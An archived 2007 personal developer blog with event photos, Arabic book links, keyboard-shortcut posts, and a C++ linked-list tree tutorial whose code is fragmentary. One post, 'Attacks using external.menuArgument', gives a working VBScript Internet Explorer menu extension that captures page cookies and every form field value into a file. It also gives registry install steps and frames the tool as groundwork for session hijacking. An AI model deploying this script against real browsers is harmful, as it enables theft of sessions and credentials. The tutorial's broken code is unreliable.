Search This Blog

Monday, February 26, 2007

Sunday, February 25, 2007

Microsoft/IDSA Design Competition

Peace be upon you

IT IS AMAZING, Microsoft always the best, they push people to innovate, they have done an amazing contest for PC design all I am going to do now is show you some pictures and some links for the whole story

here is the links for the whole issue

and the pictures

Saturday, February 17, 2007

MDC 2007 Photos

as u know I was in MDC 2007 and here is some photos for the event with some really cool guys from Arab Team and Microsoft

Arab Team and me with Andrew Pradoe and Surupa Biswas

Me with Boris Jabes (Program Manager VC++)

Me , ArabTeam with Edward Jezierski and Eugenio Pace

Me, Arab Team , Chalie Calvert and Patrick Hynds

Me, Arab Team and Chalie Calvert

Me, Arab Team and Chalie Calvert

Me, Arab Team and Mohamed Wahba ( Microsoft Egypt )

PURE Arabteam

PURE Arabteam

PURE Arabteam

For more photos check out this link :)

I hope u like it

Wednesday, February 14, 2007

My Free Arabic ASP.NET 2.0 Book

Peace be upon you

this link is for Arabian guys, this about my First book in middle east talk about ASP.NET 2.0 , I publish it since about a year, anyways the book is in Arabic, here is link for the whole story

I have updated the link.

thanks for your time

Monday, February 12, 2007

Intel® Web 2.0 Technology Development Kit (TDK)

Peace be upon you

how are you guys? for sure most of us working on web development application that require some security procedures, so Intel did something very good and useful to use, they make this cool library that provide this key features:

  • Support for Windows XP* operating system.

  • Support IE6/7 and Firefox

  • Allows creation of user-defined callbacks in an object-oriented way to handle specific platform events.

  • Provides a high-level JavaScript API to get information about battery power states, network connectivity, and processor information, including number of cores.

    • Power information API

    • Connectivity information API

    • Storage information API

    • Bandwidth information API

    • Processor information API

    • Location information API

I think most of us need this stuff, also this stuff are avilable with it's source code

here is the link for the whole story

thanks for your time

Sunday, February 11, 2007

Dynamic Linked List Tree

if you want to see the Artical in better view


            First of all I want to thank you for your passion to learn new things, now lets move on for what I am going to tell you, The idea of Linked List Tree is so simple I assume that you have some knowledge about what is linked list.

 What is Linked List Tree?

-          it's some how new concept to speed up dealing with the data which require nested data types and information like family tree and things like that, this idea of Linked List Tree based on the Double linked list, as we know that linked list is a data type that contain a pointer with same type, here is code which I explain what I mean


struct DoubleLinkList


/* this is pointer of the same data type which will point to the      

   Previous object(instance) for this Type */

      DoubleLinkList *Previous;


      wchar_t UserName[50];


/* this is pointer of the same data type which will point to the Next

   object(instance) for this Type */

      DoubleLinkList *Next;



Now let's explain what Linked List Tree, in figure 1, it shows that each instance (object) of the data type will point to more than element, as you can see in the figure each element has a path "?-?-?", for Example let's see the element path "1-3-2" you will notice that this instance is linked with it's parent "1-3" which is related to object instance path "1", now I think it's theoretically clear , it's like double linked list except that it has more than childes, I think we need little peace of code to explain this.




Figure 1



How to write code that supports Tree Linked List?

The answer is Array of pointers to childes and pointer to parent, and here is the code which explain what I am talking about


struct TreeLinkedList


      /*    This pointer has the same data type which

            will point to the parent instance of this

            same data type */

      TreeLinkedList* Parent;


      wchar_t UserName[50];


      /*    Here is the most important part of the

            whole idea, it's an array of poiters

            that will point to the child instances

            of the same data type*/

      std::vector<TreeLinkedList*> Childes;

      // I used vector (one of standard tamplate library)

      // you can find nice articals about it in


      // some how there is problems with WTL and STD so if you

      // don't like or can't use the STD vector, you can do it as

      // structred data type (I mean by that adding some functions

      // that will manage adding new pointers to child pointers array )




            // don't forget to deallcate the memory






How to use what I just wrote?


// here we did some instance of our TreeLinkedList Data type

// you can understand from the varible names the hirarchy

// of the tree

TreeLinkedList CurrentInstance;

TreeLinkedList CurrentInstanceChild1;

TreeLinkedList CurrentInstanceChild1_1;

TreeLinkedList CurrentInstanceChild2;

TreeLinkedList CurrentInstanceChild2_1;

TreeLinkedList CurrentInstanceChild2_2;

TreeLinkedList CurrentInstanceChild2_2_1;

TreeLinkedList CurrentInstanceChild2_3;

TreeLinkedList CurrentInstanceChild2_3_1;


// Frist assign the root instance pointer to NULL to guarantee that

// this instance is a parent

CurrentInstance.Parent = 0;

// Add the root childs using the vector templat class member (push_back)


// Assgin the parent pointer to this instance of data type

CurrentInstanceChild1.Parent = &CurrentInstance;


//same as CurrentInstanceChild1


//same as CurrentInstanceChild1

CurrentInstanceChild2.Parent = &CurrentInstance;


// after that you are going to assgin the childs tree and parent pointer



CurrentInstanceChild1_1.Parent = &CurrentInstance;



CurrentInstanceChild2_1.Parent = &CurrentInstanceChild2;


CurrentInstanceChild2_2.Parent = &CurrentInstanceChild2;


CurrentInstanceChild2_3.Parent = &CurrentInstanceChild2;



CurrentInstanceChild2_2_1.Parent = &CurrentInstanceChild2_2;



CurrentInstanceChild2_3_1.Parent = &CurrentInstanceChild2_3;


I think the sample is so clear, but how can we fetch the data the UserName from the  CurrentInstanceChild2_3_1 Instance, simply you will treat it like array of pointer and here it is how to get the UserName for the targeted instance




Someone may think that is may be useless to do something like that , we are still writing a lot of code to add and fetch the data, in this case I will tell you that this theory is used for dynamic trees, or you have to wait until it's need appear.


Now really thanks for your time which you spend in reading what I wrote.

Attacks using external.menuArgument

if you want to see the Artical in better view

New way to get all web page information

The idea:  the core idea of this trick that is in Internet Explorer there is little back door to get all information of the web page and change it's content, the trick is in registry  at the key


HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\


In this key you can add new item to internet explorer context menu for example if you add this key


HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\~~~~~~Get All Page Info~~~~

You will have this view 

Sample screenshot


The second part of the trick is in the next link


The Property menuArgument gives you ability to write vb and java scripts that run on the client area and you have to know that menuArgument is part of external object


if you collect all that together you can write script that will be called by the menu and do what every you want to with the page, here is example that read all cookies information , all forms information and all elements in the forms then save it in text file on C:\Infomation .text


<script language=vbscript>
on error resume next
    set EventElement = external.menuArguments.document
    FilesFolder = "C:\MyHacks\GrappedFiles"
    set t=createobject ("SCRIPTING.FILESYSTEMOBJECT")
    if not t.FolderExists(FilesFolder) then t.CreateFolder(FilesFolder)
    strFileName = FilesFolder & "\" & CleanString( EventElement.title & "___"  & date & "_" & Time ) & ".txt"
    set l=t.OpenTextFile(strFileName,8,true)
    l.Write "/////////////////////////////// New Hacky ///////////////////////////////"  & vbCrLf
    l.Write "Url is = " & EventElement.url & vbCrLf
    l.Write "Page Title is = " & EventElement.title & vbCrLf
    l.Write  EventElement.cookie & vbCrLf  & vbCrLf  & vbCrLf


for i = 0 to EventElement.forms.length -1
    l.Write "_-_-_-_-_-_-_-_-_-_-_-_-_ Form infomration _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_" & vbCrLf
          l.Write " Form Name = " & EventElement.forms.item(i).Name & vbCrLf
          l.Write " Form Action = " & EventElement.forms.item(i).action & vbCrLf
          l.Write " Form Method = " & EventElement.forms.item(i).method & vbCrLf
          l.Write " Elements Count = " & EventElement.forms.item(i).elements.length & vbCrLf
   for ele = 0 to EventElement.forms.item(i).elements.length-1
          l.Write "------------------------- Element infomration ------------------------------" &  vbCrLf
          l.Write " Information for element number " & ele + 1 & vbCrLf
          l.Write " Elements Name = " & EventElement.forms.item(i).elements.item(ele).name & vbCrLf
          l.Write " Elements Value = " & EventElement.forms.item(i).elements.item(ele).value & vbCrLf
          l.Write vbCrLf & vbCrLf  & vbCrLf
          l.Write "Thanks to GOD to give me power to learn and teach."
          l.Write "Pray for me to learn more to be able to learn you" & vbCrLf
          l.Write "الحمد لله , الهم أرزقنى علما نافع و رزقا واسع و شفاء من كل داء"
          l.Write vbCrLf & vbCrLf  & vbCrLf 
Function CleanString(strTarget) ' this function will clear the unacceptable characters for file name
 strTarget = Replace(strTarget, """", "-")
 strTarget = Replace(strTarget, "'", "-")
 strTarget = Replace(strTarget, "\", "-")
 strTarget = Replace(strTarget, "/", "-")
 strTarget = Replace(strTarget, "|", "-")
 strTarget = Replace(strTarget, ">", "-")
 strTarget = Replace(strTarget, "<", "-")
 strTarget = Replace(strTarget, "*", "-")
 strTarget = Replace(strTarget, ":", "-")
 strTarget = Replace(strTarget, "?", "-")
 CleanString = strTarget
End Function
external.menuArguments.window.alert("All data are in the file " & vbcrlf & vbcrlf & strFileName)


As you can see simple vbscript file that 100% depends on external.menuArguments , it collect the data which you want then save it on TXT file


In the upcoming part of this series I will give some tips on how to change in the main document and do what ever you want , it will help so much in some attacks, and I will explain how to protect the web pages against this attacks, before closing here is the steps to install this script and test it


Step 1: copy file HackingScript.htm to any folder and get the file path

Step 2: open " regedit " from run and navigate to the key

 HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\

Step 3: Add new key with the name "~~~~~~~~~Get All Page information~~~~~~~~"

Step 4: change the default key value to the HackingScript.htm path as you did in the first step

Step 5: open internet explorer and start right click and click on our new menu  

Step 6: you will find file C:\Information.txt contain all information of the page.


I wish you like the article, wait for the next part which will contain how to use this type in attack such "Page Simulation" and "Session HiJacking", in the next part I will explain how to protect your application against these attacks, have a nice article ;)


Thanks for your time



Attached to the article 2 files

HackingScript.rar :  contain the HTML file and Registry file which contain all in the article

HackingScript.exe : SFX file which can be installed directly to C:\ and add the menu to IE


There is one thing I want to mention somepeople ask what is going to happen if i use this script "it will get MY DATA" I just want to say that this script are able to modify things can't be done without this trick. try to use your imagination and guess what can you do with that, I write more in this topic, because it will be really harmful,:) I will explain later how to protect your web site from such things

Saturday, February 10, 2007

2nd Part of First Chapter in Perfromance book

Peace be upon you

how are you guys? I know that most of you don't know or notice that I have Arabic Blog, anyways I have added new topic about perfromance I wish from Arabian Visitors to go and read it
thanks for your time :)

best regards
Ahmed Essam

Thursday, February 08, 2007

Visual C++ Keyboard shortcuts

Same as VC#, here is the shortcuts for the VC++ 2005
I wish you like it :)

Visual C# Keyboard shortcuts

peace be upon you

I think noone ever think that there is guide for keyboard shortcuts, so I bringe it for all of you

I wish you like it :)

Microsoft have done a great work with VC++

Peace be upon you

hi people, how are you all?
first of all, I don't wanna "Anti-Microsftism" guys to attach me, I like anything related to technology, based on this role I have to admit with something I got From MDC 2007, Microsoft did a lot of work to enrich the powerful of Visual C++, Actually there is nothing can describe how much this people are doing a great work, the IDE is amazing, with any other IDE it may take hours to look for some stuff in the code, all you have to do with VC++ 2005 just guess any thing about your targeted code, you will find all you want, now "finding sting in heap of straw" is so easy, you know because Microsoft provides you with a HUGE electromagnet, so all u have to do is just get close to the heap of straw and u will get what you want,all of that is just admonition that it is really great, I really like thier work and I wish that they keep working more and more, I will explain later what I have got from MDC 2007, excuse me guys I am BUSY ,

thanks for your time

Monday, February 05, 2007

Cairo ICT 2007

Peace be upon you

How are you guys? I was in Cairo ICT 2007 and it was really AMAZING I saw a lot of new stuff that is really cool, the most amazing thing is that I met "Dr.Tarek Kaml" the Minister of "Ministry of Communication and Information Technology", I snap a little video for the minister and Mr.Karem Ramadan, after that I was in Microsoft Community Booth "ArabTeam2000", "Innovation-Hut" and "Barmaji", it was really cool.
The other cool thing is that I saw and work on the "Intel Classmate" YAAAAAA it is here in Egypt Finally, CARIA I saw a lot of cool things there, Small machine has amazing performance, Intel did a great work in this, I also Saw AMD but I have to say that they are as doesn't exist, Intel Products are everywhere,
I saw a Satellite DSL Modem I LIKED IT SO MUCH

Sorry I write that in rush, I will try to write when I have more time.

ArabTeam 2000 Booth


Cool Laptop :D people was throuing rocks on it and it was fine :D

link for the Dr.Tarek Kaml

Sunday, February 04, 2007

New Series of Performance in Arabic

Peace be upon you

I have started writing about cool stuff I really like, it's about Performance Analyzing and enhancing "of course from my point of view", I am writing this series in Arabic for my Arabian brother and sister, I wish they got good information about this issue from what I am writing and what I am going, here is the link for the first article in the series

Thanks for your time :)
There was an error in this gadget